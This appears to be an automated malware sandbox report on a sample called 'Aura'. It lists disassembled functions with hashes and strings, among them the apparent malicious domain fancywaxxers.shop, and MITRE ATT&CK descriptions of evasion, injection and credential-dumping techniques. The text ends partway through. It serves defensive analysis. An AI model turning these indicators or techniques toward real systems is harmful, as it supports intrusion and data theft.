Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: ,R$V
API String ID: 0-4265119356
Opcode ID: cf382bd1f156c7ca81fbf7619e662d11e4360b2c48c3b397a7aa4cc6cf73c994
Instruction ID: bd88a4d05d85be329552219b6527e614372a39b58cc19d67c16d62b94d36e19f
Opcode Fuzzy Hash: cf382bd1f156c7ca81fbf7619e662d11e4360b2c48c3b397a7aa4cc6cf73c994
Instruction Fuzzy Hash: 4D51EE7460C3C08FE3358B6594757EBBBE0AFA3304F18596DC1C99B282D7B9440A8B57

Function 004301DE Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

Xi[l, xrefs: 00430219
U[, xrefs: 00430313

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: U[$Xi[l
API String ID: 0-746648827
Opcode ID: 91ef735f4f5e006094fb66d3325f0878088b0e40671aafc9514e25fb668043fa
Instruction ID: ccd5a6173153e65e514e0cdb73b8ed96eda7b6c73cf3442fd0baa61904509f1d
Opcode Fuzzy Hash: 91ef735f4f5e006094fb66d3325f0878088b0e40671aafc9514e25fb668043fa
Instruction Fuzzy Hash: 1A415B706597808EE7358F24C4757EBBBE1AB93304F1849ADC1D99B282C7794509CB87

Function 004301DC Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

Xi[l, xrefs: 00430219
U[, xrefs: 00430313

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: U[$Xi[l
API String ID: 0-746648827
Opcode ID: f75183ad6dd3eb824a56c68cda1a061d347a95a128ca6cb4010bba8836a8fea6
Instruction ID: 2b4c95799020957ec3a06c6a4776a81c56b49ce9be49b6847579cf5e20f788a2
Opcode Fuzzy Hash: f75183ad6dd3eb824a56c68cda1a061d347a95a128ca6cb4010bba8836a8fea6
Instruction Fuzzy Hash: A5415A706597808EE734CF10C476BEBBBE1AB93304F18496DC6D99B282CBB944058B87

Function 0040A95C Relevance: 2.5, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

fancywaxxers.shop, xrefs: 0040A967, 0040A984, 0040A990, 0040A9D7
oh, xrefs: 0040A99A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: fancywaxxers.shop$oh
API String ID: 0-2098372046
Opcode ID: cb76880ba55def8dbc47d0884902aa1ae3b1d49ff38de1fe67dec6b584bd1062
Instruction ID: 2a72e24d441510edd85d211cd96d5c35375dfa7257783de6f4dad6b28a68c894
Opcode Fuzzy Hash: cb76880ba55def8dbc47d0884902aa1ae3b1d49ff38de1fe67dec6b584bd1062
Instruction Fuzzy Hash: 4C018FA42503018AD3248F08C86227373B1EF52394706AD3BE4839BBA8E37C9855D31F

Function 00415D3C Relevance: 2.4, Strings: 1, Instructions: 1101COMMON

Download Yara Rule

Strings

gul, xrefs: 00415E9A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: gul
API String ID: 0-2423020800
Opcode ID: 467c85a487fea0eb11a31c32f5a4abaae1ff644405d8a141a198605e6aceaa0e
Instruction ID: bd49338a6f3ef592bc63deeecc4b03fd9f9170fcf4212ae810bfdf7191afd955
Opcode Fuzzy Hash: 467c85a487fea0eb11a31c32f5a4abaae1ff644405d8a141a198605e6aceaa0e
Instruction Fuzzy Hash: 0972F274200601DFD3258F28D850B63BBF2FF56314F1A866DD4968B7A1D738E896CB98

Function 0043F8D0 Relevance: 2.1, Strings: 1, Instructions: 873COMMON

Download Yara Rule

Strings

z4?F, xrefs: 00440153

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: z4?F
API String ID: 0-3250920497
Opcode ID: 0c249310474f941d419679c7f6ce1dbcff39491b931d31c9f397fd4cf39e3218
Instruction ID: 3cab54c3d5376086d17e522595679e2d4e4ce97428badbf8e5a0e39a19657a2f
Opcode Fuzzy Hash: 0c249310474f941d419679c7f6ce1dbcff39491b931d31c9f397fd4cf39e3218
Instruction Fuzzy Hash: B252F23AE10225CBDB14CF69C8912AEB7F2FF49320F1A8579C845AB394D7789D41CB94

Function 0041CB80 Relevance: 1.7, Strings: 1, Instructions: 434COMMON

Download Yara Rule

Strings

8c\], xrefs: 0041CFEF, 0041CFFC

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: 8c\]
API String ID: 0-1570653498
Opcode ID: d37ce25c6b933fa41d7d0e137bc3c00513542ef95c0727d419da97451c832414
Instruction ID: 4e7b868bcbd26ec4b2208f7922b278286faaf9af1fffab73fab628c6070ebb6a
Opcode Fuzzy Hash: d37ce25c6b933fa41d7d0e137bc3c00513542ef95c0727d419da97451c832414
Instruction Fuzzy Hash: 5EB1FDB55483018BC724CF28C8917ABB7F1EF95324F188A2DE8D59B390E738D945C79A

Function 0042EC80 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

", xrefs: 0042EF77

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 77bcd1f4f35c65d0f15dcae320a2ca18a8166e504067f7fbfcfc37c22603230e
Instruction ID: 1c4e251798fc75b21c898b6b205f6c5143d662d6408eb99b21b7bfba2e1a040f
Opcode Fuzzy Hash: 77bcd1f4f35c65d0f15dcae320a2ca18a8166e504067f7fbfcfc37c22603230e
Instruction Fuzzy Hash: 22D12771B083259BD724CE26E48076BB7E5AF84314F99893EE48587382D73CDD09C796

Function 0043F140 Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043F350

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 46aeb21522d7035c980f3add3582d95fdc03fc4cd77e28550198740094a73f02
Instruction ID: 92d3416106a5f2d09c7f984169a08e11fa29c9cf858055f3fa01238d53d6f769
Opcode Fuzzy Hash: 46aeb21522d7035c980f3add3582d95fdc03fc4cd77e28550198740094a73f02
Instruction Fuzzy Hash: E2A17975E043009BD324CF24D88172BB792EBE9324F15963EE895573A5D7399C0AC789

Function 0042FEE4 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

,R, xrefs: 0043004A

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID: ,R
API String ID: 0-2468055690
Opcode ID: 47c51fd5e78f28ac5fa13f6f2102ca9862a598f45ba168e2498b593180d3bc8b
Instruction ID: b2c28e122c3289a0526240a92ab7cc99f7f806b8bb049d7c40d3544163d459de
Opcode Fuzzy Hash: 47c51fd5e78f28ac5fa13f6f2102ca9862a598f45ba168e2498b593180d3bc8b
Instruction Fuzzy Hash: 34512376A083D08BE7358B2894657EBBBF0AFE7304F19192DC4CD9B341D77948068B96

Function 004082D0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5403c0ff75763e972657be6ae961b6bd9767d21f581050b490139c8552877c3
Instruction ID: aada16fadd98378c99a67abf99daf3f5bce055dc494341e679a76cd010730d9e
Opcode Fuzzy Hash: d5403c0ff75763e972657be6ae961b6bd9767d21f581050b490139c8552877c3
Instruction Fuzzy Hash: 0CC15C71A087114BC314CF29C99026BBBD2ABC1314F198A7EE8D5E73D5EA39DD018B89

Function 0041F620 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb64a30d3a7c0af7ade0b004899acb8aaf38c0e6eb8be7b117d79cbd9c2e884
Instruction ID: 5c480e6074bbfef7cd5aaba57d533927b7e05c0a9b4b11ae40bd31afc8abda96
Opcode Fuzzy Hash: bdb64a30d3a7c0af7ade0b004899acb8aaf38c0e6eb8be7b117d79cbd9c2e884
Instruction Fuzzy Hash: 93614A355083915FC7258F38D84096B7BE0AF96314F08827EE8E4473D2D635DC4AC796

Function 0042D1E0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de4ee1b69d633228a487d0338cbab75f2f3055e086e59dc68944b00c11d40d31
Instruction ID: ea8e7ef6e4446d51d856cd8feb33b3639054253e8d39c924cf6f53a21e5f4615
Opcode Fuzzy Hash: de4ee1b69d633228a487d0338cbab75f2f3055e086e59dc68944b00c11d40d31
Instruction Fuzzy Hash: 5051F572A04B518FC734CF59D880667B7E1BF85324758866ED8AACB742C738F806CB94

Function 0043F510 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4515f03f2e80d8a84d546a8bbb63c3c979275c93f159f77625b675aacf22332e
Instruction ID: 40f6ca6e3e2b403426e54c1ad2412dc6515c732299bc3f752c75cf2fc95f3d66
Opcode Fuzzy Hash: 4515f03f2e80d8a84d546a8bbb63c3c979275c93f159f77625b675aacf22332e
Instruction Fuzzy Hash: 743139B1E043016BF714AE24EC41B2B77D4DF95358F14543EF88993261E639DC0A869A

Function 0041C081 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cace8034d3de102e5f60ad4e888e82099f7011bae2a6451838d429c973ec0f33
Instruction ID: 3db4f4e5e8c70796c5d5af59523ba4ffce4497ab8f1bffc18872058bd34ec33e
Opcode Fuzzy Hash: cace8034d3de102e5f60ad4e888e82099f7011bae2a6451838d429c973ec0f33
Instruction Fuzzy Hash: 7631EB756447418FC3258F38C4D06B7BBA2AF96304F18869DD0D68B782C639E84BC799

Function 0041FAF0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ee01d87f9f1125ae7c40a44981b15fdfb4623e56a70adf237b7ed55427d6f7
Instruction ID: 25555551086222354604a41d6e9582e4dea202eec33a5f0659a16cd9eea9f121
Opcode Fuzzy Hash: c6ee01d87f9f1125ae7c40a44981b15fdfb4623e56a70adf237b7ed55427d6f7
Instruction Fuzzy Hash: 13411271A083048ADB108F25C4947EBFBE2BF91314F14C42ED4984B755E27DA98ED799

Function 0043B9C0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 8265ec17b1891324edc1123b62970930dddac953ce4487e9f71a9c0ff70cfe40
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 14112933A045D40EC3129D3C8440666BFA34A97234F2953DAF4B59B3D2D7268D8A93A9

Function 0042D390 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f29799d7a09e7fac4b56c63eff5e417d30407041b9e1cdc4a79c0c45dc5c778e
Instruction ID: 4811029639d33da9431f261f23c695f5ea4601d84969f2799bfc9e29bdcba2b7
Opcode Fuzzy Hash: f29799d7a09e7fac4b56c63eff5e417d30407041b9e1cdc4a79c0c45dc5c778e
Instruction Fuzzy Hash: 8801B1F1F0071147E720EE15E4C072BB2A8AF84718F59403EE84957342DB79EC09869A

Function 00441E60 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfe02a5693d1a6dc2a9b801835713968f3a3e6ad77d8723a4a35e4035fd13bd1
Instruction ID: 275b4a21b223c026d15395952a207021f1b181473e21531ae6155f41e530546c
Opcode Fuzzy Hash: dfe02a5693d1a6dc2a9b801835713968f3a3e6ad77d8723a4a35e4035fd13bd1
Instruction Fuzzy Hash: F9F0A97A6042087BE2205F459C40D3777EEEB8E768F60033AF95412271E726ED51D7A9

Function 0041F890 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 7af846048071c4a87e9aa9f16cbe4320f8bb424dd83d34e45775a19156d71f1f
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 82D0A7719487A10E57588D3804A04B7FBE8E987612B1814AFE4D5E7209D338DC47469C

Function 00430B09 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 199COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00430C7F

Strings

+0<9, xrefs: 00430B61
Lr`, xrefs: 00430BFA
$i|], xrefs: 00430B8D
++9&, xrefs: 00430B82
wLUS, xrefs: 00430C8B
/6h;, xrefs: 00430B6C
4), xrefs: 00430C9B
'8#!, xrefs: 00430B77

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: FreeLibrary
String ID: $i|]$'8#!$++9&$+0<9$/6h;$4)$Lr`$wLUS
API String ID: 3664257935-1502747223
Opcode ID: 290550434827e201a28b8c1ea7aae5e2a1e54a8af9c34e9f792ca6c22afde8cd
Instruction ID: c3af573b3fb7cadadde60e390593c53326485074e63e6c8c0dc98633f0cf769c
Opcode Fuzzy Hash: 290550434827e201a28b8c1ea7aae5e2a1e54a8af9c34e9f792ca6c22afde8cd
Instruction Fuzzy Hash: 065159725083918BE339CF25D860BABBBD1EFD5304F185A6DE4D96B381CB780905CB96

Function 0042C780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042C8A5

Strings

G%&, xrefs: 0042C855
~p, xrefs: 0042C811

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: G%&$~p
API String ID: 237503144-3739697913
Opcode ID: e26d2e33261ad147ee263f0c4c1aead4b65c929088650ef4eac784c4a85d3c43
Instruction ID: 8b6324daec1efcd7aa17dfb1abbe8ef06dc29c72de401b93242e2a7edb1b80ac
Opcode Fuzzy Hash: e26d2e33261ad147ee263f0c4c1aead4b65c929088650ef4eac784c4a85d3c43
Instruction Fuzzy Hash: 23418CB0D002289FDB64CFA998567CEBB74EB05300F1181ADD44DBB242DB744A8A8F91

Function 00427130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427239

Strings

prB, xrefs: 0042725C
@F, xrefs: 00427172

Memory Dump Source

Source File: 00000003.00000002.2897885728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2897885728.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Aura.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: prB$@F
API String ID: 237503144-1076045038
Opcode ID: 7974c719c30dc780075a480f813cd862d4f36b0ba0727e6582c39beba0150f68
Instruction ID: c7ad9f97239bd6d335663b52f72034dbd29063f204f04396b8d2c413d92262da
Opcode Fuzzy Hash: 7974c719c30dc780075a480f813cd862d4f36b0ba0727e6582c39beba0150f68
Instruction Fuzzy Hash: AF3194B5108354AFD310CF10D98076BBAE4FBC6B04F01892CEAD96B281C3B69806CF96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
